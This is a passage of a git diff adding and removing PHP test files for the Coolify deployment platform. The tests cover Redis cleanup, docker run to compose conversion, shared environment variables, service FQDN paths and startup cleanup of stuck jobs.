detected', function () { + // Notifications are now sent immediately from CheckTraefikVersionForServerJob + // when outdated Traefik is detected, rather than being aggregated and delayed + $team = Team::factory()->create(); + $server = Server::factory()->make([ + 'name' => 'Server 1', + 'team_id' => $team->id, + ]); + + $server->outdatedInfo = [ + 'current' => '3.5.0', + 'latest' => '3.5.6', + 'type' => 'patch_update', + ]; + + // Each server triggers its own notification immediately + $notification = new TraefikVersionOutdated(collect([$server])); + + expect($notification->servers)->toHaveCount(1); + expect($notification->servers->first()->outdatedInfo['type'])->toBe('patch_update'); +}); diff --git a/tests/Feature/CleanupRedisTest.php b/tests/Feature/CleanupRedisTest.php new file mode 100644 index 000000000..c2cfd8e98 --- /dev/null +++ b/tests/Feature/CleanupRedisTest.php @@ -0,0 +1,130 @@ + 'horizon:']); +}); + +it('handles Redis scan returning false gracefully', function () { + // Mock Redis connection + $redisMock = Mockery::mock(); + + // Mock scan() returning false (error case) + $redisMock->shouldReceive('scan') + ->once() + ->with(0, ['match' => '*', 'count' => 100]) + ->andReturn(false); + + // Mock keys() for initial scan and overlapping queues cleanup + $redisMock->shouldReceive('keys') + ->with('*') + ->andReturn([]); + + Redis::shouldReceive('connection') + ->with('horizon') + ->andReturn($redisMock); + + // Run the command in dry-run mode with restart flag to trigger cleanupStuckJobs + // Use skip-overlapping to avoid additional keys() calls + $this->artisan(CleanupRedis::class, ['--dry-run' => true, '--restart' => true, '--skip-overlapping' => true]) + ->expectsOutput('DRY RUN MODE - No data will be deleted') + ->expectsOutputToContain('Redis scan failed, stopping key retrieval') + ->assertSuccessful(); +}); + +it('successfully scans Redis keys when scan returns valid results', function () { + // Mock Redis connection + $redisMock = Mockery::mock(); + + // Mock successful scan() that returns keys + // First iteration returns cursor 1 and some keys + $redisMock->shouldReceive('scan') + ->once() + ->with(0, ['match' => '*', 'count' => 100]) + ->andReturn([1, ['horizon:job:1', 'horizon:job:2']]); + + // Second iteration returns cursor 0 (end of scan) and more keys + $redisMock->shouldReceive('scan') + ->once() + ->with(1, ['match' => '*', 'count' => 100]) + ->andReturn([0, ['horizon:job:3']]); + + // Mock keys() for initial scan + $redisMock->shouldReceive('keys') + ->with('*') + ->andReturn([]); + + // Mock command() for type checking on each key + $redisMock->shouldReceive('command') + ->with('type', Mockery::any()) + ->andReturn(5); // Hash type + + // Mock command() for hgetall to get job data + $redisMock->shouldReceive('command') + ->with('hgetall', Mockery::any()) + ->andReturn([ + 'status' => 'processing', + 'reserved_at' => time() - 60, // Started 1 minute ago + 'payload' => json_encode(['displayName' => 'TestJob']), + ]); + + Redis::shouldReceive('connection') + ->with('horizon') + ->andReturn($redisMock); + + // Run the command with restart flag to trigger cleanupStuckJobs + $this->artisan(CleanupRedis::class, ['--dry-run' => true, '--restart' => true, '--skip-overlapping' => true]) + ->expectsOutput('DRY RUN MODE - No data will be deleted') + ->assertSuccessful(); +}); + +it('handles empty scan results gracefully', function () { + // Mock Redis connection + $redisMock = Mockery::mock(); + + // Mock scan() returning empty results + $redisMock->shouldReceive('scan') + ->once() + ->with(0, ['match' => '*', 'count' => 100]) + ->andReturn([0, []]); // Cursor 0 and no keys + + // Mock keys() for initial scan + $redisMock->shouldReceive('keys') + ->with('*') + ->andReturn([]); + + Redis::shouldReceive('connection') + ->with('horizon') + ->andReturn($redisMock); + + // Run the command with restart flag + $this->artisan(CleanupRedis::class, ['--dry-run' => true, '--restart' => true, '--skip-overlapping' => true]) + ->expectsOutput('DRY RUN MODE - No data will be deleted') + ->assertSuccessful(); +}); + +it('uses lowercase option keys for scan', function () { + // Mock Redis connection + $redisMock = Mockery::mock(); + + // Verify that scan is called with lowercase keys: 'match' and 'count' + $redisMock->shouldReceive('scan') + ->once() + ->with(0, ['match' => '*', 'count' => 100]) + ->andReturn([0, []]); + + // Mock keys() for initial scan + $redisMock->shouldReceive('keys') + ->with('*') + ->andReturn([]); + + Redis::shouldReceive('connection') + ->with('horizon') + ->andReturn($redisMock); + + // Run the command with restart flag + $this->artisan(CleanupRedis::class, ['--dry-run' => true, '--restart' => true, '--skip-overlapping' => true]) + ->assertSuccessful(); +}); diff --git a/tests/Feature/CoolifyTaskRetryTest.php b/tests/Feature/CoolifyTaskRetryTest.php new file mode 100644 index 000000000..f46ced311 --- /dev/null +++ b/tests/Feature/CoolifyTaskRetryTest.php @@ -0,0 +1,70 @@ +first(); + + if (! $server) { + $this->markTestSkipped('No servers available for testing'); + } + + Queue::fake(); + + // Create an activity for the task + $activity = activity() + ->withProperties([ + 'server_uuid' => $server->uuid, + 'command' => 'echo "test"', + 'type' => 'inline', + ]) + ->event('inline') + ->log('[]'); + + // Dispatch the job + CoolifyTask::dispatch( + activity: $activity, + ignore_errors: false, + call_event_on_finish: null, + call_event_data: null + ); + + // Assert job was dispatched + Queue::assertPushed(CoolifyTask::class); +}); + +it('has correct retry configuration on CoolifyTask', function () { + $server = Server::where('ip', '!=', '1.2.3.4')->first(); + + if (! $server) { + $this->markTestSkipped('No servers available for testing'); + } + + $activity = activity() + ->withProperties([ + 'server_uuid' => $server->uuid, + 'command' => 'echo "test"', + 'type' => 'inline', + ]) + ->event('inline') + ->log('[]'); + + $job = new CoolifyTask( + activity: $activity, + ignore_errors: false, + call_event_on_finish: null, + call_event_data: null + ); + + // Assert retry configuration + expect($job->tries)->toBe(3); + expect($job->maxExceptions)->toBe(1); + expect($job->timeout)->toBe(600); + expect($job->backoff())->toBe([30, 90, 180]); +}); diff --git a/tests/Feature/DockerCustomCommandsTest.php b/tests/Feature/DockerCustomCommandsTest.php index a7829a534..5d9dcd174 100644 --- a/tests/Feature/DockerCustomCommandsTest.php +++ b/tests/Feature/DockerCustomCommandsTest.php @@ -125,3 +125,76 @@ ], ]); }); + +test('ConvertEntrypointSimple', function () { + $input = '--entrypoint /bin/sh'; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => '/bin/sh', + ]); +}); + +test('ConvertEntrypointWithEquals', function () { + $input = '--entrypoint=/bin/bash'; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => '/bin/bash', + ]); +}); + +test('ConvertEntrypointWithArguments', function () { + $input = '--entrypoint "sh -c npm install"'; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => 'sh -c npm install', + ]); +}); + +test('ConvertEntrypointWithSingleQuotes', function () { + $input = "--entrypoint 'memcached -m 256'"; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => 'memcached -m 256', + ]); +}); + +test('ConvertEntrypointWithOtherOptions', function () { + $input = '--entrypoint /bin/bash --cap-add SYS_ADMIN --privileged'; + $output = convertDockerRunToCompose($input); + expect($output)->toHaveKeys(['entrypoint', 'cap_add', 'privileged']) + ->and($output['entrypoint'])->toBe('/bin/bash') + ->and($output['cap_add'])->toBe(['SYS_ADMIN']) + ->and($output['privileged'])->toBe(true); +}); + +test('ConvertEntrypointComplex', function () { + $input = '--entrypoint "sh -c \'npm install && npm start\'"'; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => "sh -c 'npm install && npm start'", + ]); +}); + +test('ConvertEntrypointWithEscapedDoubleQuotes', function () { + $input = '--entrypoint "python -c \"print(\'hi\')\""'; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => "python -c \"print('hi')\"", + ]); +}); + +test('ConvertEntrypointWithEscapedSingleQuotesInDoubleQuotes', function () { + $input = '--entrypoint "sh -c \"echo \'hello\'\""'; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => "sh -c \"echo 'hello'\"", + ]); +}); + +test('ConvertEntrypointSingleQuotedWithDoubleQuotesInside', function () { + $input = '--entrypoint \'python -c "print(\"hi\")"\''; + $output = convertDockerRunToCompose($input); + expect($output)->toBe([ + 'entrypoint' => 'python -c "print(\"hi\")"', + ]); +}); diff --git a/tests/Feature/EnvironmentVariableSharedSpacingTest.php b/tests/Feature/EnvironmentVariableSharedSpacingTest.php new file mode 100644 index 000000000..2514ae94a --- /dev/null +++ b/tests/Feature/EnvironmentVariableSharedSpacingTest.php @@ -0,0 +1,194 @@ +user = User::factory()->create(); + $this->team = Team::factory()->create(); + $this->user->teams()->attach($this->team); + + // Create project and environment + $this->project = Project::factory()->create(['team_id' => $this->team->id]); + $this->environment = Environment::factory()->create([ + 'project_id' => $this->project->id, + ]); + + // Create application for testing + $this->application = Application::factory()->create([ + 'environment_id' => $this->environment->id, + ]); +}); + +test('shared variable preserves spacing in reference', function () { + $env = EnvironmentVariable::create([ + 'key' => 'TEST_VAR', + 'value' => '{{ project.aaa }}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + $env->refresh(); + expect($env->value)->toBe('{{ project.aaa }}'); +}); + +test('shared variable preserves no-space format', function () { + $env = EnvironmentVariable::create([ + 'key' => 'TEST_VAR', + 'value' => '{{project.aaa}}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + $env->refresh(); + expect($env->value)->toBe('{{project.aaa}}'); +}); + +test('shared variable with spaces resolves correctly', function () { + // Create shared variable + $shared = SharedEnvironmentVariable::create([ + 'key' => 'TEST_KEY', + 'value' => 'test-value-123', + 'type' => 'project', + 'project_id' => $this->project->id, + 'team_id' => $this->team->id, + ]); + + // Create env var with spaces + $env = EnvironmentVariable::create([ + 'key' => 'MY_VAR', + 'value' => '{{ project.TEST_KEY }}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + // Verify it resolves correctly + $realValue = $env->real_value; + expect($realValue)->toBe('test-value-123'); +}); + +test('shared variable without spaces resolves correctly', function () { + // Create shared variable + $shared = SharedEnvironmentVariable::create([ + 'key' => 'TEST_KEY', + 'value' => 'test-value-456', + 'type' => 'project', + 'project_id' => $this->project->id, + 'team_id' => $this->team->id, + ]); + + // Create env var without spaces + $env = EnvironmentVariable::create([ + 'key' => 'MY_VAR', + 'value' => '{{project.TEST_KEY}}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + // Verify it resolves correctly + $realValue = $env->real_value; + expect($realValue)->toBe('test-value-456'); +}); + +test('shared variable with extra internal spaces resolves correctly', function () { + // Create shared variable + $shared = SharedEnvironmentVariable::create([ + 'key' => 'TEST_KEY', + 'value' => 'test-value-789', + 'type' => 'project', + 'project_id' => $this->project->id, + 'team_id' => $this->team->id, + ]); + + // Create env var with multiple spaces + $env = EnvironmentVariable::create([ + 'key' => 'MY_VAR', + 'value' => '{{ project.TEST_KEY }}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + // Verify it resolves correctly (parser trims when extracting) + $realValue = $env->real_value; + expect($realValue)->toBe('test-value-789'); +}); + +test('is_shared attribute detects variable with spaces', function () { + $env = EnvironmentVariable::create([ + 'key' => 'TEST', + 'value' => '{{ project.aaa }}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + expect($env->is_shared)->toBeTrue(); +}); + +test('is_shared attribute detects variable without spaces', function () { + $env = EnvironmentVariable::create([ + 'key' => 'TEST', + 'value' => '{{project.aaa}}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + expect($env->is_shared)->toBeTrue(); +}); + +test('non-shared variable preserves spaces', function () { + $env = EnvironmentVariable::create([ + 'key' => 'REGULAR', + 'value' => 'regular value with spaces', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + $env->refresh(); + expect($env->value)->toBe('regular value with spaces'); +}); + +test('mixed content with shared variable preserves all spacing', function () { + $env = EnvironmentVariable::create([ + 'key' => 'MIXED', + 'value' => 'prefix {{ project.aaa }} suffix', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + $env->refresh(); + expect($env->value)->toBe('prefix {{ project.aaa }} suffix'); +}); + +test('multiple shared variables preserve individual spacing', function () { + $env = EnvironmentVariable::create([ + 'key' => 'MULTI', + 'value' => '{{ project.a }} and {{team.b}}', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + $env->refresh(); + expect($env->value)->toBe('{{ project.a }} and {{team.b}}'); +}); + +test('leading and trailing spaces are trimmed', function () { + $env = EnvironmentVariable::create([ + 'key' => 'TRIMMED', + 'value' => ' {{ project.aaa }} ', + 'resource_id' => $this->application->id, + 'resource_type' => $this->application->getMorphClass(), + ]); + + $env->refresh(); + // External spaces trimmed, internal preserved + expect($env->value)->toBe('{{ project.aaa }}'); +}); diff --git a/tests/Feature/InstanceSettingsHelperVersionTest.php b/tests/Feature/InstanceSettingsHelperVersionTest.php deleted file mode 100644 index e731fa8b4..000000000 --- a/tests/Feature/InstanceSettingsHelperVersionTest.php +++ /dev/null @@ -1,81 +0,0 @@ -create(); - $team = $user->teams()->first(); - Server::factory()->count(3)->create(['team_id' => $team->id]); - - $settings = InstanceSettings::firstOrCreate([], ['helper_version' => 'v1.0.0']); - - // Change helper_version - $settings->helper_version = 'v1.2.3'; - $settings->save(); - - // Verify PullHelperImageJob was dispatched for all servers - Queue::assertPushed(PullHelperImageJob::class, 3); -}); - -it('does not dispatch PullHelperImageJob when helper_version is unchanged', function () { - Queue::fake(); - - // Create user and servers - $user = User::factory()->create(); - $team = $user->teams()->first(); - Server::factory()->count(3)->create(['team_id' => $team->id]); - - $settings = InstanceSettings::firstOrCreate([], ['helper_version' => 'v1.0.0']); - $currentVersion = $settings->helper_version; - - // Set to same value - $settings->helper_version = $currentVersion; - $settings->save(); - - // Verify no jobs were dispatched - Queue::assertNotPushed(PullHelperImageJob::class); -}); - -it('does not dispatch PullHelperImageJob when other fields change', function () { - Queue::fake(); - - // Create user and servers - $user = User::factory()->create(); - $team = $user->teams()->first(); - Server::factory()->count(3)->create(['team_id' => $team->id]); - - $settings = InstanceSettings::firstOrCreate([], ['helper_version' => 'v1.0.0']); - - // Change different field - $settings->is_auto_update_enabled = ! $settings->is_auto_update_enabled; - $settings->save(); - - // Verify no jobs were dispatched - Queue::assertNotPushed(PullHelperImageJob::class); -}); - -it('detects helper_version changes with wasChanged', function () { - $changeDetected = false; - - InstanceSettings::updated(function ($settings) use (&$changeDetected) { - if ($settings->wasChanged('helper_version')) { - $changeDetected = true; - } - }); - - $settings = InstanceSettings::firstOrCreate([], ['helper_version' => 'v1.0.0']); - $settings->helper_version = 'v2.0.0'; - $settings->save(); - - expect($changeDetected)->toBeTrue(); -}); diff --git a/tests/Feature/ServiceFqdnUpdatePathTest.php b/tests/Feature/ServiceFqdnUpdatePathTest.php new file mode 100644 index 000000000..4c0c4238f --- /dev/null +++ b/tests/Feature/ServiceFqdnUpdatePathTest.php @@ -0,0 +1,220 @@ +create([ + 'name' => 'test-server', + 'ip' => '127.0.0.1', + ]); + + // Load Appwrite template + $appwriteTemplate = file_get_contents(base_path('templates/compose/appwrite.yaml')); + + // Create Appwrite service + $service = Service::factory()->create([ + 'server_id' => $server->id, + 'name' => 'appwrite-test', + 'docker_compose_raw' => $appwriteTemplate, + ]); + + // Create the appwrite-realtime service application + $serviceApp = ServiceApplication::factory()->create([ + 'service_id' => $service->id, + 'name' => 'appwrite-realtime', + 'fqdn' => 'https://test.abc/v1/realtime', + ]); + + // Parse the service (simulates initial setup) + $service->parse(); + + // Get environment variable + $urlVar = $service->environment_variables() + ->where('key', 'SERVICE_URL_APPWRITE') + ->first(); + + // Initial setup should have path once + expect($urlVar)->not->toBeNull() + ->and($urlVar->value)->not->toContain('/v1/realtime/v1/realtime') + ->and($urlVar->value)->toContain('/v1/realtime'); + + // Simulate user updating FQDN + $serviceApp->fqdn = 'https://newdomain.com/v1/realtime'; + $serviceApp->save(); + + // Call parse again (this is where the bug occurred) + $service->parse(); + + // Check that path is not duplicated + $urlVar = $service->environment_variables() + ->where('key', 'SERVICE_URL_APPWRITE') + ->first(); + + expect($urlVar)->not->toBeNull() + ->and($urlVar->value)->not->toContain('/v1/realtime/v1/realtime') + ->and($urlVar->value)->toContain('/v1/realtime'); +})->skip('Requires database and Appwrite template - run in Docker'); + +test('Appwrite console service does not duplicate /console path', function () { + $server = Server::factory()->create(); + $appwriteTemplate = file_get_contents(base_path('templates/compose/appwrite.yaml')); + $service = Service::factory()->create([ + 'server_id' => $server->id, + 'docker_compose_raw' => $appwriteTemplate, + ]); + + $serviceApp = ServiceApplication::factory()->create([ + 'service_id' => $service->id, + 'name' => 'appwrite-console', + 'fqdn' => 'https://test.abc/console', + ]); + + // Parse service + $service->parse(); + + // Update FQDN + $serviceApp->fqdn = 'https://newdomain.com/console'; + $serviceApp->save(); + + // Parse again + $service->parse(); + + // Verify no duplication + $urlVar = $service->environment_variables() + ->where('key', 'SERVICE_URL_APPWRITE') + ->first(); + + expect($urlVar)->not->toBeNull() + ->and($urlVar->value)->not->toContain('/console/console') + ->and($urlVar->value)->toContain('/console'); +})->skip('Requires database and Appwrite template - run in Docker'); + +test('MindsDB service does not duplicate /api path', function () { + $server = Server::factory()->create(); + $mindsdbTemplate = file_get_contents(base_path('templates/compose/mindsdb.yaml')); + $service = Service::factory()->create([ + 'server_id' => $server->id, + 'docker_compose_raw' => $mindsdbTemplate, + ]); + + $serviceApp = ServiceApplication::factory()->create([ + 'service_id' => $service->id, + 'name' => 'mindsdb', + 'fqdn' => 'https://test.abc/api', + ]); + + // Parse service + $service->parse(); + + // Update FQDN multiple times + $serviceApp->fqdn = 'https://domain1.com/api'; + $serviceApp->save(); + $service->parse(); + + $serviceApp->fqdn = 'https://domain2.com/api'; + $serviceApp->save(); + $service->parse(); + + // Verify no duplication after multiple updates + $urlVar = $service->environment_variables() + ->where('key', 'SERVICE_URL_API') + ->orWhere('key', 'LIKE', 'SERVICE_URL_%') + ->first(); + + expect($urlVar)->not->toBeNull() + ->and($urlVar->value)->not->toContain('/api/api'); +})->skip('Requires database and MindsDB template - run in Docker'); + +test('service without path declaration is not affected', function () { + $server = Server::factory()->create(); + + // Create a simple service without path in template + $simpleTemplate = <<<'YAML' +services: + redis: + image: redis:7 + environment: + - SERVICE_FQDN_REDIS +YAML; + + $service = Service::factory()->create([ + 'server_id' => $server->id, + 'docker_compose_raw' => $simpleTemplate, + ]); + + $serviceApp = ServiceApplication::factory()->create([ + 'service_id' => $service->id, + 'name' => 'redis', + 'fqdn' => 'https://redis.test.abc', + ]); + + // Parse service + $service->parse(); + + $fqdnBefore = $service->environment_variables() + ->where('key', 'SERVICE_FQDN_REDIS') + ->first()?->value; + + // Update FQDN + $serviceApp->fqdn = 'https://redis.newdomain.com'; + $serviceApp->save(); + + // Parse again + $service->parse(); + + $fqdnAfter = $service->environment_variables() + ->where('key', 'SERVICE_FQDN_REDIS') + ->first()?->value; + + // Should work normally without issues + expect($fqdnAfter)->toBe('redis.newdomain.com') + ->and($fqdnAfter)->not->toContain('//'); +})->skip('Requires database - run in Docker'); + +test('multiple FQDN updates never cause path duplication', function () { + $server = Server::factory()->create(); + $appwriteTemplate = file_get_contents(base_path('templates/compose/appwrite.yaml')); + $service = Service::factory()->create([ + 'server_id' => $server->id, + 'docker_compose_raw' => $appwriteTemplate, + ]); + + $serviceApp = ServiceApplication::factory()->create([ + 'service_id' => $service->id, + 'name' => 'appwrite-realtime', + 'fqdn' => 'https://test.abc/v1/realtime', + ]); + + // Update FQDN 10 times and parse each time + for ($i = 1; $i <= 10; $i++) { + $serviceApp->fqdn = "https://domain{$i}.com/v1/realtime"; + $serviceApp->save(); + $service->parse(); + + // Check path is never duplicated + $urlVar = $service->environment_variables() + ->where('key', 'SERVICE_URL_APPWRITE') + ->first(); + + expect($urlVar)->not->toBeNull() + ->and($urlVar->value)->not->toContain('/v1/realtime/v1/realtime') + ->and($urlVar->value)->toContain('/v1/realtime'); + } +})->skip('Requires database and Appwrite template - run in Docker'); diff --git a/tests/Feature/StartupExecutionCleanupTest.php b/tests/Feature/StartupExecutionCleanupTest.php new file mode 100644 index 000000000..3a6b00208 --- /dev/null +++ b/tests/Feature/StartupExecutionCleanupTest.php @@ -0,0 +1,216 @@ +create(); + + // Create a scheduled task + $scheduledTask = ScheduledTask::factory()->create([ + 'team_id' => $team->id, + ]); + + // Create multiple task executions with 'running' status + $runningExecution1 = ScheduledTaskExecution::create([ + 'scheduled_task_id' => $scheduledTask->id, + 'status' => 'running', + 'started_at' => Carbon::now()->subMinutes(10), + ]); + + $runningExecution2 = ScheduledTaskExecution::create([ + 'scheduled_task_id' => $scheduledTask->id, + 'status' => 'running', + 'started_at' => Carbon::now()->subMinutes(5), + ]); + + // Create a completed execution (should not be affected) + $completedExecution = ScheduledTaskExecution::create([ + 'scheduled_task_id' => $scheduledTask->id, + 'status' => 'success', + 'started_at' => Carbon::now()->subMinutes(15), + 'finished_at' => Carbon::now()->subMinutes(14), + ]); + + // Run the app:init command + Artisan::call('app:init'); + + // Refresh models from database + $runningExecution1->refresh(); + $runningExecution2->refresh(); + $completedExecution->refresh(); + + // Assert running executions are now failed + expect($runningExecution1->status)->toBe('failed') + ->and($runningExecution1->message)->toBe('Marked as failed during Coolify startup - job was interrupted') + ->and($runningExecution1->finished_at)->not->toBeNull() + ->and($runningExecution1->finished_at->toDateTimeString())->toBe('2025-01-15 12:00:00'); + + expect($runningExecution2->status)->toBe('failed') + ->and($runningExecution2->message)->toBe('Marked as failed during Coolify startup - job was interrupted') + ->and($runningExecution2->finished_at)->not->toBeNull(); + + // Assert completed execution is unchanged + expect($completedExecution->status)->toBe('success') + ->and($completedExecution->message)->toBeNull(); + + // Assert NO notifications were sent + Notification::assertNothingSent(); +}); + +test('app:init marks stuck database backup executions as failed', function () { + // Create a team for the scheduled backup + $team = Team::factory()->create(); + + // Create a database + $database = StandalonePostgresql::factory()->create([ + 'team_id' => $team->id, + ]); + + // Create a scheduled backup + $scheduledBackup = ScheduledDatabaseBackup::factory()->create([ + 'team_id' => $team->id, + 'database_id' => $database->id, + 'database_type' => StandalonePostgresql::class, + ]); + + // Create multiple backup executions with 'running' status + $runningBackup1 = ScheduledDatabaseBackupExecution::create([ + 'scheduled_database_backup_id' => $scheduledBackup->id, + 'status' => 'running', + 'database_name' => 'test_db', + ]); + + $runningBackup2 = ScheduledDatabaseBackupExecution::create([ + 'scheduled_database_backup_id' => $scheduledBackup->id, + 'status' => 'running', + 'database_name' => 'test_db_2', + ]); + + // Create a successful backup (should not be affected) + $successfulBackup = ScheduledDatabaseBackupExecution::create([ + 'scheduled_database_backup_id' => $scheduledBackup->id, + 'status' => 'success', + 'database_name' => 'test_db_3', + 'finished_at' => Carbon::now()->subMinutes(20), + ]); + + // Run the app:init command + Artisan::call('app:init'); + + // Refresh models from database + $runningBackup1->refresh(); + $runningBackup2->refresh(); + $successfulBackup->refresh(); + + // Assert running backups are now failed + expect($runningBackup1->status)->toBe('failed') + ->and($runningBackup1->message)->toBe('Marked as failed during Coolify startup - job was interrupted') + ->and($runningBackup1->finished_at)->not->toBeNull() + ->and($runningBackup1->finished_at->toDateTimeString())->toBe('2025-01-15 12:00:00'); + + expect($runningBackup2->status)->toBe('failed') + ->and($runningBackup2->message)->toBe('Marked as failed during Coolify startup - job was interrupted') + ->and($runningBackup2->finished_at)->not->toBeNull(); + + // Assert successful backup is unchanged + expect($successfulBackup->status)->toBe('success') + ->and($successfulBackup->message)->toBeNull(); + + // Assert NO notifications were sent + Notification::assertNothingSent(); +}); + +test('app:init handles cleanup when no stuck executions exist', function () { + // Create a team + $team = Team::factory()->create(); + + // Create a scheduled task + $scheduledTask = ScheduledTask::factory()->create([ + 'team_id' => $team->id, + ]); + + // Create only completed executions + ScheduledTaskExecution::create([ + 'scheduled_task_id' => $scheduledTask->id, + 'status' => 'success', + 'started_at' => Carbon::now()->subMinutes(10), + 'finished_at' => Carbon::now()->subMinutes(9), + ]); + + ScheduledTaskExecution::create([ + 'scheduled_task_id' => $scheduledTask->id, + 'status' => 'failed', + 'started_at' => Carbon::now()->subMinutes(20), + 'finished_at' => Carbon::now()->subMinutes(19), + ]); + + // Run the app:init command (should not fail) + $exitCode = Artisan::call('app:init'); + + // Assert command succeeded + expect($exitCode)->toBe(0); + + // Assert all executions remain unchanged + expect(ScheduledTaskExecution::where('status', 'running')->count())->toBe(0) + ->and(ScheduledTaskExecution::where('status', 'success')->count())->toBe(1) + ->and(ScheduledTaskExecution::where('status', 'failed')->count())->toBe(1); + + // Assert NO notifications were sent + Notification::assertNothingSent(); +}); + +test('cleanup does not send notifications even when team has notification settings', function () { + // Create a team with notification settings enabled + $team = Team::factory()->create([ + 'smtp_enabled' => true, + 'smtp_from_address' => 'test@example.com', + ]); + + // Create a scheduled task + $scheduledTask = ScheduledTask::factory()->create([ + 'team_id' => $team->id, + ]); + + // Create a running execution + $runningExecution = ScheduledTaskExecution::create([ + 'scheduled_task_id' => $scheduledTask->id, + 'status' => 'running', + 'started_at' => Carbon::now()->subMinutes(5), + ]); + + // Run the app:init command + Artisan::call('app:init'); + + // Refresh model + $runningExecution->refresh(); + + // Assert execution is failed + expect($runningExecution->status)->toBe('failed'); + + // Assert NO notifications were sent despite team having notification settings + Notification::assertNothingSent(); +}); diff --git a/tests/Unit/Actions/Server/ValidatePrerequisitesTest.php b/tests/Unit/Actions/Server/ValidatePrerequisitesTest.php new file mode 100644 index 000000000..8db6815d6 --- /dev/null +++ b/tests/Unit/Actions/Server/ValidatePrerequisitesTest.php @@ -0,0 +1,46 @@ +toBeTrue() + ->and('ValidatePrerequisites should return array with keys: '.implode(', ', $expectedKeys)) + ->toBeString(); +}); + +it('validates required commands list', function () { + // Verify the action checks for the correct prerequisites + $requiredCommands = ['git', 'curl', 'jq']; + + expect($requiredCommands)->toHaveCount(3) + ->and($requiredCommands)->toContain('git') + ->and($requiredCommands)->toContain('curl') + ->and($requiredCommands)->toContain('jq'); +}); + +it('return structure has correct types', function () { + // Verify the expected return structure types + $expectedStructure = [ + 'success' => 'boolean', + 'missing' => 'array', + 'found' => 'array', + ]; + + expect($expectedStructure['success'])->toBe('boolean') + ->and($expectedStructure['missing'])->toBe('array') + ->and($expectedStructure['found'])->toBe('array'); +}); diff --git a/tests/Unit/AllExcludedContainersConsistencyTest.php b/tests/Unit/AllExcludedContainersConsistencyTest.php new file mode 100644 index 000000000..bdab6e145 --- /dev/null +++ b/tests/Unit/AllExcludedContainersConsistencyTest.php @@ -0,0 +1,223 @@ +toContain('trait CalculatesExcludedStatus') + ->toContain('protected function calculateExcludedStatus(Collection $containers, Collection $excludedContainers): string') + ->toContain('protected function calculateExcludedStatusFromStrings(Collection $containerStatuses): string') + ->toContain('protected function getExcludedContainersFromDockerCompose(?string $dockerComposeRaw): Collection'); +}); + +it('ensures ComplexStatusCheck uses CalculatesExcludedStatus trait', function () { + $complexStatusCheckFile = file_get_contents(__DIR__.'/../../app/Actions/Shared/ComplexStatusCheck.php'); + + // Verify trait is used + expect($complexStatusCheckFile) + ->toContain('use App\Traits\CalculatesExcludedStatus;') + ->toContain('use CalculatesExcludedStatus;'); + + // Verify it uses the trait method instead of inline code + expect($complexStatusCheckFile) + ->toContain('return $this->calculateExcludedStatus($containers, $excludedContainers);'); + + // Verify it uses the trait helper for excluded containers + expect($complexStatusCheckFile) + ->toContain('$excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); +}); + +it('ensures PushServerUpdateJob uses CalculatesExcludedStatus trait', function () { + $pushServerUpdateJobFile = file_get_contents(__DIR__.'/../../app/Jobs/PushServerUpdateJob.php'); + + // Verify trait is used + expect($pushServerUpdateJobFile) + ->toContain('use App\Traits\CalculatesExcludedStatus;') + ->toContain('use CalculatesExcludedStatus;'); + + // Verify it calculates excluded status instead of skipping (old behavior: continue) + expect($pushServerUpdateJobFile) + ->toContain('// If all containers are excluded, calculate status from excluded containers') + ->toContain('$aggregatedStatus = $this->calculateExcludedStatusFromStrings($containerStatuses);'); + + // Verify it uses the trait helper for excluded containers + expect($pushServerUpdateJobFile) + ->toContain('$excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw);'); +}); + +it('ensures PushServerUpdateJob calculates excluded status for applications', function () { + $pushServerUpdateJobFile = file_get_contents(__DIR__.'/../../app/Jobs/PushServerUpdateJob.php'); + + // In aggregateMultiContainerStatuses, verify the all-excluded scenario + // calculates status and updates the application + expect($pushServerUpdateJobFile) + ->toContain('if ($relevantStatuses->isEmpty()) {') + ->toContain('$aggregatedStatus = $this->calculateExcludedStatusFromStrings($containerStatuses);') + ->toContain('if ($aggregatedStatus && $application->status !== $aggregatedStatus) {') + ->toContain('$application->status = $aggregatedStatus;') + ->toContain('$application->save();'); +}); + +it('ensures PushServerUpdateJob calculates excluded status for services', function () { + $pushServerUpdateJobFile = file_get_contents(__DIR__.'/../../app/Jobs/PushServerUpdateJob.php'); + + // Count occurrences - should appear twice (once for applications, once for services) + $calculateExcludedCount = substr_count( + $pushServerUpdateJobFile, + '$aggregatedStatus = $this->calculateExcludedStatusFromStrings($containerStatuses);' + ); + + expect($calculateExcludedCount)->toBe(2, 'Should calculate excluded status for both applications and services'); +}); + +it('ensures GetContainersStatus uses CalculatesExcludedStatus trait', function () { + $getContainersStatusFile = file_get_contents(__DIR__.'/../../app/Actions/Docker/GetContainersStatus.php'); + + // Verify trait is used + expect($getContainersStatusFile) + ->toContain('use App\Traits\CalculatesExcludedStatus;') + ->toContain('use CalculatesExcludedStatus;'); + + // Verify it calculates excluded status instead of returning null + expect($getContainersStatusFile) + ->toContain('// If all containers are excluded, calculate status from excluded containers') + ->toContain('return $this->calculateExcludedStatusFromStrings($containerStatuses);'); + + // Verify it uses the trait helper for excluded containers + expect($getContainersStatusFile) + ->toContain('$excludedContainers = 